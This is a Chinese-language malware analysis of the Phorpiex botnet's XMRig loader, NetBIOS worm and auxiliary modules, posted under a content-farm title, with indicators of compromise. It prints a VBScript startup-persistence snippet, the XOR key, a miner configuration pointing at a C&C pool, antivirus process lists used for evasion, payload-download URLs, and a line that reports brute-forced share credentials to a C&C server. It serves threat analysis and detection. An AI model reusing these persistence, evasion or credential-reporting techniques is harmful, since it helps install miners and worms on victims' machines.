怎么實(shí)現(xiàn)Phorpiex僵尸網(wǎng)絡(luò)技術(shù)分析

這篇文章將為大家詳細(xì)講解有關(guān)怎么實(shí)現(xiàn)Phorpiex僵尸網(wǎng)絡(luò)技術(shù)分析，文章內(nèi)容質(zhì)量較高，因此小編分享給大家做個(gè)參考，希望大家閱讀完這篇文章后對(duì)相關(guān)知識(shí)有一定的了解。

XMRig

該模塊的主要目的是啟動(dòng)XMRig monero礦機(jī)。門羅幣（或XMR）是一種去中心化的加密貨幣，通過分布式共識(shí)確認(rèn)，然后記錄在區(qū)塊鏈上。該加密貨幣對(duì)攻擊者非常有吸引力， Monero無法追蹤，默認(rèn)情況下混淆了發(fā)送和接收地址以及交易量。 Monero區(qū)塊鏈上的交易不能鏈接到特定用戶或真實(shí)世界的身份。

Monero采礦機(jī)是由XMRig的開源代碼構(gòu)成，是Phorpiex僵尸網(wǎng)絡(luò)獲利的有效載荷之一，被感染的計(jì)算機(jī)每月可產(chǎn)生約15,000美元的收入。攻擊者將礦機(jī)植入受感染的計(jì)算機(jī)并運(yùn)行，礦工本身及其參數(shù)使用簡單的密碼進(jìn)行混淆，并嵌入到模塊中。在執(zhí)行之前，惡意軟件會(huì)將參數(shù)解密并傳遞給礦工。

Phorpiex使用的XMRig與在網(wǎng)上出售的相同，攻擊者很可能是在網(wǎng)上購買的。

加載流程

初始化

為了防止運(yùn)行多個(gè)XMRig，加載程序會(huì)創(chuàng)建具有硬編碼名稱的互斥。樣本中的名稱有所不同。 發(fā)現(xiàn)以下硬編碼變體：

4b293105d7b102179b20

bf73f1604fc0b6b3d70d

持久化

加載程序?qū)⒆陨韽?fù)制到“ C：\ ProgramData \ {HardcodedFolder} \ {HardcodedExecutable}”。在不同樣本中“ {HardcodedExecutable}”參數(shù)值：

cfgmgr.exe

windrv32.exe

sysdrv32.exe

路徑“ C：\ ProgramData \ {HardcodedFolder}”也用于存儲(chǔ)臨時(shí)文件，例如VB腳本和傳遞給礦工的配置。在不同的樣本中“ {HardcodedFolder}”參數(shù)值：

FeSdavbMaL

ADwXcSSGvY

該惡意軟件在啟動(dòng)文件夾中創(chuàng)建一個(gè)指向自我復(fù)制的鏈接：

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\{HardcodedFilename}.url

在不同的樣本中“ {HardcodedFilename}”參數(shù)值：

kBBcUBIbha

LtHgNeMqRB

下圖顯示了啟動(dòng)文件夾中的鏈接以及可執(zhí)行文件的路徑：

加載程序會(huì)根據(jù)系統(tǒng)中是否存在以下防惡意軟件進(jìn)程來選擇啟動(dòng)URL的方法：

a2guard.exe

a2service.exe

a2start.exe

如果未檢測到這些集成，則通過執(zhí)行以下腳本創(chuàng)建啟動(dòng)鏈接：

Set objFSO=CreateObject("Scripting.FileSystemObject")

outFile="C:\Users\Lab\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kBBcUBIbha.url"

Set objFile = objFSO.CreateTextFile(outFile,True)

objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///C:\ProgramData\FeSdavbMaL\cfgmgr.exe"""

objFile.Close

如果VB腳本未能創(chuàng)建此啟動(dòng)配置，或者檢測到上面列出的任何進(jìn)程，則將使用WinAPI函數(shù)直接從加載程序中調(diào)用。該函數(shù)內(nèi)部還有一個(gè)附加檢查：是否正在運(yùn)行任何反惡意軟件進(jìn)程。通常使用以下命令執(zhí)行：

cmd.exe / C WScript“ C：\ ProgramData \ FeSdavbMaL \ r.vbs”

如果遇到以下任何過程，則使用線程注入（請參閱線程注入部分）代替直接的“ cmd”調(diào)用：

bdagent.exe

vsserv.exe

cfp.exe

ccavsrv.exe

cmdagent.exe

avp.exe

avpui.exe

ksde.exe

對(duì)于x86，加載程序?qū)⑺阉鱡xplorer.exe。對(duì)于x64，將枚舉所有進(jìn)程，但是將忽略這兩個(gè)進(jìn)程：

csrss.exe

winlogon.exe

下圖總結(jié)了以上所有內(nèi)容：

加密

加載程序配置值和XMRig Miner有效負(fù)載使用XOR加密。 解密密鑰“ 0125789244697858”被硬編碼到二進(jìn)制文件中。 解密后：

 C&C server URL to contact : http://185.176.27[.]132/update.txt

XMR crypto-wallet (re-written by the user ID but used directly in other Phorpiex modules):

4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQujt72bSgzs7j6uNDV

Mining pool : 176.27.132:4545

加載程序

礦工可執(zhí)行文件使用硬編碼的XOR密鑰解密：

礦工從“ C：\ Windows \ System32”目錄（即wuapp.exe）注入到新創(chuàng)建進(jìn)程的地址空間中。 在執(zhí)行期間，加載程序?qū)z查taskmgr.exe的狀態(tài)。 如果檢測到任務(wù)管理器正在運(yùn)行，加載程序終止礦工并循環(huán)掛起，直到任務(wù)管理器不再運(yùn)行。未檢測到taskmgr.exe時(shí)，礦工將再次啟動(dòng)。

下圖顯示了其外觀：

注入細(xì)節(jié)

注入過程最特殊之處是函數(shù)的調(diào)用方式。加載程序映射自己的ntdll.dll副本，搜索必要的函數(shù)，對(duì)這些函數(shù)進(jìn)行內(nèi)部數(shù)組指針處理，然后再調(diào)用它們。ntdll.dll的地址是通過PEB獲得的：

ESI中有ntdll.dll地址：

ESI 777A000 ntdll.777A000

礦工配置

加載程序?qū)⑴渲帽４娴健?C：\ ProgramData \ {HardcodedFolder} \ cfg”，并將其作為命令行參數(shù)傳遞給Miner。 配置具有以下結(jié)構(gòu)：

{
	"algo": "cryptonight",
	"autosave": false,
	"background": false,
	"colors": true,
	"retries": 5,
	"retry-pause": 5,
	"syslog": false,
	"print-time": 60,
	"av": 0,
	"safe": false,
	"cpu-priority": null,
	"cpu-affinity": null,
	"donate-level": 0,
	"threads": 1,
	"pools": [
		{
			"url": "185.176.27.132:4545",
			"user": "ea7c252d-5590-4983-995d-02a1a35bb966",
			"pass": "x",
			"keepalive": false,
			"nicehash": false,
			"variant": "r",
			"tls": false,
			"tls-fingerprint": null
		}
	],
	"api": {
		"port": 0,
		"access-token": null,
		"worker-id": null
	}
}

在研究的樣本中，所有的配置值都為硬編碼的，“線程”值等于系統(tǒng)中處理器的數(shù)量。

未使用的信息

在加載程序執(zhí)行期間，發(fā)現(xiàn)了內(nèi)存中存在的XMR錢包。 不同的樣本可能包含不同的錢包。

4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQujt72bSgzs7j6uNDV

4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoMMyaX2Eun2XCgFYq

分析此模塊中XMR錢包的用途，檢查了應(yīng)該使用錢包地址的地方，發(fā)現(xiàn)已經(jīng)使用用戶ID進(jìn)行了重寫，然后進(jìn)行配置：

網(wǎng)絡(luò)通信

XMRig Loader檢查C＆C服務(wù)器上是否有新指令，并執(zhí)行找到的指令。 此通信執(zhí)行兩次：在礦工注入之前和之后， 使用不加密的HTTP協(xié)議。相應(yīng)的字段中的值：

支持命令

下面是從C＆C服務(wù)器發(fā)送命令時(shí)使用的格式（保留了原始注釋）：

[Miner]
address=YOUR_XMR_ADDRES ; XMR address, email (minergate), btc address (nicehash), etc.
poolport=pool.minexmr.com:4444 ; Do not include 'stratum+tcp://' e.g monerohash.com:3333
password=x ; Pool password
stop=0 ; Change this value to "1" to stop miner. If not specified or equal to "0" miner will work.
proxy=0 ; Change this value to "1" if you are mining to xmrig-proxy instead of pool. This enables using a unqiue address per worker for better miner monitoring.
keepalive=0 ; 0 to disable keepalive, 1 to enable keepalive

[Update]
;config_url=http://xmrminer.net/config.txt ; You can update the url that points to the configuration file. Must begin with "http://" or "https://"
knock_time=30 ; Number of minutes the miner waits between visits to config file. If never specified, default is 30 minutes.
;update_url=http://mysite.com/new_miner ; url of new miner. Miner will get updated with this file.
;update_hash=xxxxxxxxxx ; md5 hash of new miner file. 32 characters long (16 byte hexadecimal format for hash). You need to specify this value, othewise miner will not get updated!

;End of configuration. Do not remove this line, ";End" string specifies end of configuration file.

;Everything after a ";" character is a comment, so it is ignored by the miner when parsing the configuration. Only the ";" character is used for this purpose.
;Always include the appropriate options below the defined "[Miner]" and "[Update]" sections. If you do not include the section names it won't work.
;Make sure everything is spelled correctly
;If you specify "config_url" double check it is correctly spelled, otherwise the miner that reads an incorrect url will never go back to a correct url (i.e. last configuration will be locked).

Miner update

Miner stop

服務(wù)器可能會(huì)請求其他文件名：

c.txt

upd.txt

newup.txt

update.txt

xmrupdate.txt

Phorpiex NetBIOS Worm模塊

該模塊是自我傳播的蠕蟲，還有下載其他有效負(fù)載的功能。NetBIOS蠕蟲會(huì)掃描隨機(jī)IP地址查找開放的139 TCP端口（NetBIOS），使用用戶名和密碼的硬編碼列表進(jìn)行暴力攻擊。攻擊使用rand函數(shù)隨機(jī)生成用于掃描的IP地址，將GetTickCount結(jié)果作為隨機(jī)種子。 IP地址濾規(guī)則是不能以127、172或192開頭。NetBIOS蠕蟲創(chuàng)建帶有硬編碼名稱的互斥鎖防止多次執(zhí)行。創(chuàng)建單獨(dú)線程與每個(gè)IP地址進(jìn)行通信，掃描功能與Phorpiex VNC蠕蟲模塊中的掃描功能非常相似。

如果它是由Phorpiex Tldr加載的，使用偽隨機(jī)名稱保存該模塊。在自我傳播階段，惡意軟件會(huì)使用“ WindowsDefender.exe”上傳自身。在這種情況下，NetBIOS蠕蟲必須下載Phorpiex主模塊或其他有效負(fù)載。惡意軟件通過調(diào)用GetModuleFilename獲取其文件名。如果名稱為“ WindowsDefender.exe”，它將嘗試從硬編碼的URL下載并執(zhí)行文件：

不同樣本中的URL:

hxxp://92.63.197.153/NB.exe

hxxp://92.63.197.153/nb.exe

hxxp://193.32.161.77/CRAZYBLAYNE.exe

hxxp://92.63.197.153/enum.exe

hxxp://193.32.161.77/enum.exe

hxxp://193.32.161.77/aldenta.exe

最后無限循環(huán)網(wǎng)絡(luò)掃描。 對(duì)于每個(gè)隨機(jī)生成的IP地址，NetBIOS模塊都會(huì)啟動(dòng)一個(gè)線程，檢查139 TCP端口是否在進(jìn)行偵聽。 成功連接后，NetBIOS蠕蟲會(huì)嘗試通過調(diào)用NetShareEnum API函數(shù)來枚舉網(wǎng)絡(luò)共享。

Phorpiex NetBIOS蠕蟲會(huì)嘗試使用用戶名和密碼的硬編碼列表連接到網(wǎng)絡(luò)共享：

成功連接到網(wǎng)絡(luò)資源后，惡意軟件會(huì)嘗試將自身復(fù)制到以下位置：

WindowsDefender.exe

WINDOWS\All Users\StartMenu\Programs\Startup\WindowsDefender.exe

WINDOWS\StartMenu\Programs\Startup\WindowsDefender.exe

WINNT\Profiles\All Users\StartMenu\Programs\Startup\WindowsDefender.exe

ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\WindowsDefender.exe

Users\All Users\Microsoft\Windows\Start Menu\Programs\WindowsDefender.exe

Documents and Settings\All Users\StartMenu\Programs\Startup\WindowsDefender.exe

目標(biāo)路徑指向啟動(dòng)文件夾確保其在目標(biāo)系統(tǒng)中的持久性。最后一步是在目標(biāo)主機(jī)上調(diào)用上傳功能，有兩種方式執(zhí)行：

在遠(yuǎn)程主機(jī)上創(chuàng)建新服務(wù)。惡意軟件使用“ NetBIOS Windows Defender”，為創(chuàng)建的服務(wù)設(shè)置值SERVICE_WIN32_SHARE_PROCESS，并以SERVICE_AUTO_START作為啟動(dòng)類型。

在遠(yuǎn)程主機(jī)上計(jì)劃任務(wù)。預(yù)定時(shí)間為當(dāng)前時(shí)間120秒。惡意軟件通過NetRemoteTOD API函數(shù)來獲取時(shí)間，并針對(duì)特定時(shí)區(qū)進(jìn)行更正。

操作成功后使用簡單HTTP請求，向C＆C服務(wù)器報(bào)告：

snwprintf(url, L"hxxp://92.63.197.153/e.php?srv=%ls|%ls|%ls|%ls", NetLocation, UserName, Password, Message);

HTTP請求的用戶代理：

Mozilla / 5.0（Macintosh; Intel Mac OS X 10.9; rv：25.0）Gecko / 20100101 Firefox / 25.0

該惡意軟件可以發(fā)送以下消息：

其他樣本中的信息：

在各種樣本中發(fā)現(xiàn)的URL：

hxxp://193.32.161.77/nb.php?srv=

hxxp://193.32.161.77/exec.php?srv=

hxxp://193.32.161.77/nn.php?srv=

hxxp://193.32.161.77/gud.php?srv=

hxxp://193.32.161.77/go.php?srv=

hxxp://193.32.161.77/netb.php?srv=

hxxp://193.32.161.77/ok.php?srv=

hxxp://92.63.197.153/e.php?srv=

hxxp://92.63.197.153/huh.php?srv=

hxxp://92.63.197.153/nb.php?srv=

hxxp://92.63.197.153/tst.php?srv=

hxxp://92.63.197.153/ya.php?nb=

Auxiliary模塊

Phorpiex非常通用。 主模塊接收到“命令”隊(duì)列，每個(gè)命令都是一個(gè)單獨(dú)的可執(zhí)行模塊。 還觀察到了功能非常有限的微型模塊的許多不同變體。 Phorpiex加載的此類小型可執(zhí)行文件，例如Clean-Up模塊。 它包含2個(gè)函數(shù)，目的是終止具有指定硬編碼名稱的進(jìn)程并刪除多個(gè)注冊表項(xiàng)。

清理模塊終止的進(jìn)程列表包括：

winsrvc32.exe

winupsvcmgr.exe

winsvcinstl.exe

winupd32svc.exe

wincfg32svc.exe

windrv.exe

wincfgrmg***.exe

winmgr.exe

wincfg.exe

wincfg32.exe

winupd.exe

winupd32.exe

winsvcin32.exe

winupd32cfg.exe

winmg***cfg.exe

csrssc.exe

csrsscxn.exe

winsecmgr.exe

winsecmgrv.exe

windrvmg***.exe

清理模塊還從注冊表項(xiàng)“ HKLM \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run \”中刪除以下值：

WinCfgMgr

Windows Update Service Manager

Microsoft Windows Update Services

Microsoft Update 495036

Microsoft Windows Service Installer

Microsoft Windows Driver Configuration

Microsoft Windows Installer Svc

Windows Security Manager

該模塊禁用過時(shí)的Phorpiex模塊，例如Phorpiex Trik：

另一種小型可執(zhí)行文件類型是地理位置定位。 它使用服務(wù)api.wipmania.com確定受感染計(jì)算機(jī)的位置。 如果在白名單中，惡意軟件會(huì)從硬編碼的URL下載有效負(fù)載：

2019年初發(fā)現(xiàn)針對(duì)中國和越南的加載程序，根據(jù)位置信息將GandCrab勒索軟件的不同變體加載到受感染的計(jì)算機(jī)上。

總結(jié)

Phorpiex是一個(gè)非常特殊的惡意軟件家族，其功能包括各種不同的模塊，每個(gè)功能模塊都承擔(dān)著專門的任務(wù)：發(fā)送垃圾郵件，感染蠕蟲等等。如果需要新功能，則引入新模塊，無需重建或重新配置現(xiàn)有模塊。這種方法不易出錯(cuò)，耗時(shí)少，為惡意軟件開發(fā)人員節(jié)省了大量精力。

迄今為止，Phorpiex已感染了超過一百萬臺(tái)計(jì)算機(jī)，并創(chuàng)造了可觀的利潤。我們所能看到和估計(jì)的只是冰山一角。在Phorpiex家族中的Raccoon Stealer和Predator the Thief還有更多自己獨(dú)特的方法來進(jìn)行惡意活動(dòng)。

IOC

XMRig Silent Loader

Mutex names

0fe420b0eb8396a48280

3f3ff4de39fc87f8152a

4b293105d7b102179b20

5d6eb4d965fd09330511

a6c92143cac02de51d4a

bf73f1604fc0b6b3d70d

ff9702c705fd434610c0

Strings

0125789244697858

f23e1993dfdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

objFile.Write “[InternetShortcut]” & vbCrLf & “URL=””file:///

Phorpiex NetBIOS Worm Module

URLs

hxxp://92.63.197.153/NB.exe

hxxp://92.63.197.153/nb.exe

hxxp://193.32.161.77/CRAZYBLAYNE.exe

hxxp://92.63.197.153/enum.exe

hxxp://193.32.161.77/enum.exe

hxxp://193.32.161.77/aldenta.exe

Auxiliary modules

關(guān)于怎么實(shí)現(xiàn)Phorpiex僵尸網(wǎng)絡(luò)技術(shù)分析就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，可以學(xué)到更多知識(shí)。如果覺得文章不錯(cuò)，可以把它分享出去讓更多的人看到。